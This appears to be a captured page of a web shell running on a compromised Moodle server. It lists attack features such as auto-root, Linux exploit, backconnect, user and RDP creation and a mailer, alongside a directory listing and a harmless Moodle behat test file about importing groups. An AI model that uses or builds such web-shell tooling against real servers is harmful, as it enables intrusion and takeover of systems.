Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle /
backup /
util /
ui /
tests /
behat /
[ HOME SHELL ]
Name
Size
Permission
Action
backup_courses.feature
2.67
KB
-rwxrwxrwx
behat_backup.php
17.75
KB
-rwxrwxrwx
duplicate_activities.feature
1.77
KB
-rwxrwxrwx
import_contentbank_content.fea...
1.85
KB
-rwxrwxrwx
import_course.feature
1.59
KB
-rwxrwxrwx
import_groups.feature
2.02
KB
-rwxrwxrwx
restore_moodle2_courses.featur...
10.97
KB
-rwxrwxrwx
restore_moodle2_courses_settin...
5.44
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : import_groups.feature
@core @core_backup Feature: Option to include groups and groupings when importing a course to another course In order to import a course to another course with groups and groupings As a teacher I need an option to include groups and groupings when importing a course to another course Background: Given the following "courses" exist: | fullname | shortname | | Course 1 | C1 | | Course 2 | C2 | And the following "users" exist: | username | firstname | lastname | email | | teacher1 | Teacher | 1 | teacher1@example.com | And the following "course enrolments" exist: | user | course | role | | teacher1 | C1 | editingteacher | | teacher1 | C2 | editingteacher | And the following "groups" exist: | name | description | course | idnumber | | Group 1 | Group description | C1 | GROUP1 | | Group 2 | Group description | C1 | GROUP2 | And the following "groupings" exist: | name | course | idnumber | | Grouping 1 | C1 | GROUPING1 | | Grouping 2 | C1 | GROUPING2 | And I log in as "teacher1" And I am on "Course 1" course homepage Scenario: Include groups and groupings when importing a course to another course Given I import "Course 1" course into "Course 2" course using this options: | Initial | Include groups and groupings | 1 | When I navigate to "Users > Groups" in current page administration Then I should see "Group 1" And I should see "Group 2" And I follow "Groupings" And I should see "Grouping 1" And I should see "Grouping 2" Scenario: Do not include groups and groupings when importing a course to another course Given I import "Course 1" course into "Course 2" course using this options: | Initial | Include groups and groupings | 0 | When I navigate to "Users > Groups" in current page administration Then I should not see "Group 1" And I should not see "Group 2" And I follow "Groupings" And I should not see "Grouping 1" And I should not see "Grouping 2"
Close